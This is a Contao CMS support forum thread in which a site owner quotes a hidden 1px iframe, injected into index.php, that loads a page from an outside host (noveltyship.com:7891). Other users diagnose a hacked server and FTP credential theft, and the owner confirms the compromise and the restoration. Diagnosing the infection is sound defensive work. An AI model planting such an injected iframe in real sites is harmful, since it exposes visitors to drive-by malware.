Results 1 to 4 of 4

Thread: Could this be a vulnarability?

  1. #1
    New user
    Join Date
    05-29-13.
    Posts
    2

    Default Could this be a vulnarability?

    Having updated my website from 2.10 to 2.11.11, i relaxed knowing evething was ok. However my client has reported that there is a malware warning when one tries to access the website. after inspecting the website scripts to identify the source, i realised that this line
    Code:
    <iframe width="1px" height="1px" src=" http://noveltyship.com:7891/preferences/button.php?licenses=157" style="display:block;" ></iframe>
    had been inserted just after
    Code:
    $objIndex->run();
    line.

    This is what i got.
    Code:
    /**
     * Instantiate the controller
     */
    $objIndex = new Index();
    $objIndex->run();
    <iframe width="1px" height="1px" src=" http://noveltyship.com:7891/preferences/button.php?licenses=157" style="display:block;" ></iframe>
    
    
    ?>
    Could this be a vulnerability? Kindly attend to this

  2. #2
    imported_Nina
    Gast

    Default Re: Could this be a vulnarability?

    This looks definitely not correct and is not in the Contao-core as far as I know. I suppose that your webserver got hacked.

  3. #3
    User
    Join Date
    06-19-09.
    Posts
    326

    Default Re: Could this be a vulnarability?

    check also that your pc (or the pc of the customer if he has ftp upload access) is infected

    there is a malware that stole the credentials from every ftp connection and put its code into all .php and .html files
    Consulenza Contao CMS https://www.intco.it

  4. #4
    New user
    Join Date
    05-29-13.
    Posts
    2

    Default Re: Could this be a vulnarability?

    Thanks for the replies. I noticed that client server was hacked into and true the ftp details had been stolen. It has since been restored. Contao rocks. I love it. Already introducing others here in Kenya.

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •